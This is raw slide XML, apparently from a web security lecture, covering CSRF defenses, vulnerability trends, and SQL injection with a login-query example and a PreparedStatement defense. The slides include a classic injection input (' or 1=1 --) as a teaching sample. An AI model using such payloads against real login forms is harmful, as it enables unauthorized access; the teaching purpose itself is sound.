          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="2895600"/>
              <a:ext cx="1508760" cy="1402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892627" y="2917371"/>
              <a:ext cx="1393373" cy="1349829"/>
              <a:chOff x="892627" y="2917371"/>
              <a:chExt cx="1393373" cy="1349829"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill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5" t="8917" r="79801" b="71491"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892629" y="2917371"/>
                <a:ext cx="1393371" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/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04" t="8917" r="60332" b="71491"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892629" y="3143794"/>
                <a:ext cx="1393371" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/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487" t="8666" r="25329" b="71742"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892629" y="3370217"/>
                <a:ext cx="1164771" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/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586" t="8572" r="7250" b="71836"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892628" y="3596640"/>
                <a:ext cx="1393371" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/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8" t="62418" r="79858" b="17990"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892627" y="3823063"/>
                <a:ext cx="1393371" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/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443" t="62544" r="25373" b="17864"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892627" y="4040777"/>
                <a:ext cx="1164773" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62916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CSRF Defenses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Secret Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Token: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Referrer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Validation: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Custom HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Header: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User Interaction (e.g., CAPTCHA)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18125" y="614521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40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRP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4114800" y="2438400"/>
            <a:ext cx="4133850" cy="457200"/>
            <a:chOff x="2832" y="1008"/>
            <a:chExt cx="2604" cy="28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2832" y="1008"/>
              <a:ext cx="2544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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128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832" y="1035"/>
              <a:ext cx="260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FFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>&lt;input type=hidden value=23a3af01b&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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4114800" y="4038600"/>
            <a:ext cx="4953000" cy="457200"/>
            <a:chOff x="2832" y="2050"/>
            <a:chExt cx="2986" cy="288"/>
          </a:xfrm>
        </p:grpSpPr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2832" y="2050"/>
              <a:ext cx="2880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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128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832" y="2078"/>
              <a:ext cx="29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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>Referrer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>: http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>www.facebook.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>home.php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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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4114800" y="5334000"/>
            <a:ext cx="3568700" cy="457200"/>
            <a:chOff x="2832" y="3051"/>
            <a:chExt cx="2248" cy="288"/>
          </a:xfrm>
        </p:grpSpPr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832" y="3051"/>
              <a:ext cx="2208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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/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2832" y="3078"/>
              <a:ext cx="224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FFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>X-Requested-By: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>XMLHttpRequest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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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943350"/>
            <a:ext cx="1524000" cy="72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5105400"/>
            <a:ext cx="10287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2700" y="2247900"/>
            <a:ext cx="8001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29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Vulnerability Occurrence in Applications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76200" y="1551708"/>
            <a:ext cx="7924800" cy="4940531"/>
            <a:chOff x="76200" y="1551708"/>
            <a:chExt cx="7924800" cy="4940531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Content Placeholder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800" b="61092"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="2405959"/>
              <a:ext cx="7924800" cy="786128"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Content Placeholder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61" b="78028"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="1551708"/>
              <a:ext cx="7924800" cy="854251"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Content Placeholder 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2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052" b="43200"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="3200400"/>
              <a:ext cx="7924800" cy="1720735"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Content Placeholder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286" b="27209"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="4887883"/>
              <a:ext cx="7924800" cy="160435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6705600" y="5257800"/>
            <a:ext cx="1614024" cy="1066606"/>
            <a:chOff x="6477000" y="3028927"/>
            <a:chExt cx="1614024" cy="1066606"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6477000" y="3124200"/>
              <a:ext cx="801244" cy="876060"/>
              <a:chOff x="7675224" y="3423138"/>
              <a:chExt cx="291673" cy="344660"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Content Placeholder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18" t="14740" r="70725" b="83818"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3423138"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Content Placeholder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37" t="17034" r="70306" b="81524"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3560299"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="Content Placeholder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07" t="19263" r="70236" b="79295"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675224" y="3697460"/>
                <a:ext cx="290946" cy="70338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7393396" y="3028927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2013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93397" y="3377564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2014</a:t>
              </a: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91400" y="3726201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2015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6962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SQL Injection is another example of code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adversary exploits user-controlled input to change meaning of database command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8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11500" y="2463800"/>
            <a:ext cx="1274763" cy="24066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/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Server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2463800"/>
            <a:ext cx="1395413" cy="24066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/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(Client)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412037" y="2463800"/>
            <a:ext cx="1274763" cy="24066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200" b="1"/>
              <a:t>DB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833563" y="3643312"/>
            <a:ext cx="1298575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1866900" y="4652962"/>
            <a:ext cx="11811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812925" y="2438400"/>
            <a:ext cx="1341438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/>
              <a:t>Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Password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386263" y="2532062"/>
            <a:ext cx="3025774" cy="15286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b="1" dirty="0"/>
              <a:t>SELECT * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WHERE user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'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386263" y="4076879"/>
            <a:ext cx="302577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 rot="10800000">
            <a:off x="4386264" y="4435474"/>
            <a:ext cx="3059111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26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11500" y="2463800"/>
            <a:ext cx="1274763" cy="24066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/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Server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2463800"/>
            <a:ext cx="1395413" cy="24066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/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(Client)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412037" y="2463800"/>
            <a:ext cx="1274763" cy="24066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200" b="1"/>
              <a:t>DB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833563" y="3643312"/>
            <a:ext cx="1298575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1866900" y="4652962"/>
            <a:ext cx="11811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812925" y="2438400"/>
            <a:ext cx="1341438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/>
              <a:t>Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Password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386263" y="2532062"/>
            <a:ext cx="3025774" cy="15286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b="1" dirty="0"/>
              <a:t>SELECT * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WHERE user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'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386263" y="4076879"/>
            <a:ext cx="302577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 rot="10800000">
            <a:off x="4386264" y="4435474"/>
            <a:ext cx="3059111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38907" y="5562600"/>
            <a:ext cx="5266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if user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“  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'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</a:rPr>
              <a:t>or 1=1 --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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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560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8229600" cy="2533135"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50676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SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in the Wild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409950"/>
            <a:ext cx="6096000" cy="25527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4000"/>
            <a:ext cx="3175000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28" y="2286000"/>
            <a:ext cx="3598672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Defenses Against SQL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Prepared Statements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>custname</a:t>
            </a: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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a: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("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>customerName</a:t>
            </a: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"); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
              <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
              <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a: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perform input validation to detect attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a: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query = "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>account_balance</a:t>
            </a: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 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>user_data</a:t>
            </a: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 WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>user_name</a:t>
            </a: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 = ? ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>pstmt</a:t>
            </a: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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>connection.prepareStatement</a:t>
            </a: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( query );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>pstmt.setString</a:t>
            </a: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( 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>custname</a:t>
            </a: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); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>pstmt.executeQuery</a:t>
            </a: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( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="American Typewriter" charset="0"/>
                <a:cs typeface="American Typewriter" charset="0"/>
              </a:rPr>
              <a:t>Input Validation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="American Typewriter" charset="0"/>
                <a:cs typeface="American Typewriter" charset="0"/>
              </a:rPr>
              <a:t>Case statements, cast to non-string type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="American Typewriter" charset="0"/>
                <a:cs typeface="American Typewriter" charset="0"/>
              </a:rPr>
              <a:t>Escape User-supplied inputs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="American Typewriter" charset="0"/>
                <a:cs typeface="American Typewriter" charset="0"/>
              </a:rPr>
              <a:t>Not recommended</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"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1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Vulnerability Occurrence in Applications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76200" y="1551708"/>
            <a:ext cx="7924800" cy="4940531"/>
            <a:chOff x="76200" y="1551708"/>
            <a:chExt cx="7924800" cy="4940531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Content Placeholder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800" b="61092"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="2405959"/>
              <a:ext cx="7924800" cy="786128"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Content Placeholder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61" b="78028"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="1551708"/>
              <a:ext cx="7924800" cy="854251"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Content Placeholder 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2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052" b="43200"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="3200400"/>
              <a:ext cx="7924800" cy="1720735"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Content Placeholder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286" b="27209"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="4887883"/>
              <a:ext cx="7924800" cy="160435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6705600" y="5257800"/>
